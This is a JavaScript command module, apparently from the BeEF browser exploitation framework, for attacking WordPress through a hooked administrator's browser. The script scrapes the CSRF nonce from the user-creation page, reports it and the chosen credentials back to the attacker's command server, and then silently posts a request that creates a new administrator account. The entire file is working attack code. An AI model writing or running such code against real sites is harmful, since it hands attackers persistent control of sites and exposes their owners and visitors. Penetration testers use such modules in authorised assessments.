1
//
2
// Copyright (c) 2015 Daniel Reece - @HBRN8
3
//
4

5
beef.execute(function() {
6

7
function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }
8
function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRequestHeader("Content-type","application/x-www-form-urlencoded"); x.send(b); return x.responseText; }
9
/* Kept incase there is a valid reason to use forms over AJAX, I cant think of any.
10
function post(path, params, method) {
11
    method = method || "post";
12
    var form = document.createElement("form");
13
    form.setAttribute("method", method);
14
    form.setAttribute("action", path);
15

16
    for(var key in params) {
17
        if(params.hasOwnProperty(key)) {
18
            var hiddenField = document.createElement("input");
19
            hiddenField.setAttribute("type", "hidden");
20
            hiddenField.setAttribute("name", key);
21
            hiddenField.setAttribute("value", params[key]);
22
            form.appendChild(hiddenField);
23
         }
24
    }
25
    document.body.appendChild(form);
26
    form.submit();
27
}
28
*/
29

30
var domail = '<%= @domail %>';
31

32
page = g("/wp-admin/user-new.php");
33

34
m = page.match(/\-user" value="(.*?)" \/><input/);	
35
	
36
beef.net.send("<%= @command_url %>", <%= @command_id %>, "CSRF nonce hijacked = " + m[1] + 
37
"\nCreating admin... (<%== format_multiline(@user + ':' + @pass) %>)");
38

39
var blob = "action=createuser" +
40
"&_wpnonce_create-user=" + m[1] +
41
"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" +
42
"&user_login=<%== format_multiline(@user) %>" +
43
"&email=<%== format_multiline(@email) %>" +
44
"&first_name=<%== format_multiline(@fname) %>" +
45
"&last_name=<%== format_multiline(@lname) %>" +
46
"&url=<%== format_multiline(@url) %>" +
47
"&pass1=<%== format_multiline(@pass) %>" +
48
"&pass2=<%== format_multiline(@pass) %>";
49
if (domail){
50
//Wordpress will mail regardless of param value if it exists.
51
blob = blob + "&send_password=1";
52
}
53
blob = blob + "&role=administrator&createuser=Add+New+User";
54

55
p("/wp-admin/user-new.php", blob);
56

57
/* Still cant think of any.
58
post('/wp-admin/user-new.php', 
59
{action: 'createuser', 
60
 '_wpnonce_create-user': m[1],
61
 _wp_http_referer: '%2Fwp-admin%2Fuser-new.php', 
62
 user_login: '<%== format_multiline(@user) %>',
63
 email: '<%== format_multiline(@email) %>', 
64
 first_name: '<%== format_multiline(@fname) %>', 
65
 last_name: '<%== format_multiline(@lname) %>',
66
 url: '<%== format_multiline(@url) %>',
67
 pass1: '<%== format_multiline(@pass) %>', 
68
 pass2: '<%== format_multiline(@pass) %>', 
69
 send_password: '1', 
70
 role: 'administrator', 
71
 createuser: 'Add+New+User+'});
72
*/
73
	
74
});
75